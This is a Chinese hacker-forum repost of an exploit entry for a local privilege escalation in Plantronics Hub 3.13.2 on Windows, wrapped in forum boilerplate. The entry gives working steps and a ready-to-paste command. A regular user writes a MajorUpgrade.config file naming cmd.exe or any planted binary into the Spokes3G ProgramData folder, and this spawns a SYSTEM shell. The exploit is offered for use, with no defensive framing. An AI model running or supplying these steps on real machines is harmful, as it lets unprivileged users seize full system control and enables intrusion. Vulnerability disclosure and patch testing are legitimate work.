Plantronics Hub 3.13.2 - Local Privilege Escalation - 黑帽漏洞数据库

游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

赤队小组-代号1949（原CHT攻防小组）在这个瞬息万变的网络时代，我们保持初心，创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识，您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告，请注册用户查看我们的使用与隐私策略，谢谢您的配合。小组成员可以获取论坛隐藏内容！

TheHackerWorld官方

发布于2022年11月4日2年前

# Exploit Title: Plantronics Hub 3.13.2 - Local Privilege Escalation
# Date: 2020-01-2
# Exploit Author: Markus Krell - @MarkusKrell
# Vendor Homepage: https://support.polycom.com/content/dam/polycom-support/global/documentation/plantronics-hub-local-privilege-escalation-vulnerability.pdf
# Software Link: https://www.plantronics.com/content/dam/plantronics/software/PlantronicsHubInstaller-3.13.2.exe
# Version: Plantronics Hub for Windows prior to version 3.14
# Tested on: Windows 10 Enterprise
# CVE : N/A

As a regular user drop a file called "MajorUpgrade.config" inside the "C:\ProgramData\Plantronics\Spokes3G" directory. The content of MajorUpgrade.config should look like the following one liner:
<WINDOWS-USERNAME>|advertise|<FULL-PATH-TO-YOUR-DESIRED-PAYLOAD>

Exchange <WINDOWS-USERNAME> with your local (non-administrative) username. Calling cmd.exe is the most basic exploitation, as it will spawn a system shell in your (unprivileged) windows session. 
You may of course call any other binary you can plant on the machine.

Steps for exploitation (PoC):
- Open cmd.exe 
- Navigate using cd C:\ProgramData\Plantronics\Spokes3G
- echo %username%^|advertise^|C:\Windows\System32\cmd.exe > MajorUpgrade.config

登录

游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

Plantronics Hub 3.13.2 - Local Privilege Escalation

精选回复

创建帐户或登录后发表意见

最近浏览 0

帐户

导航

搜索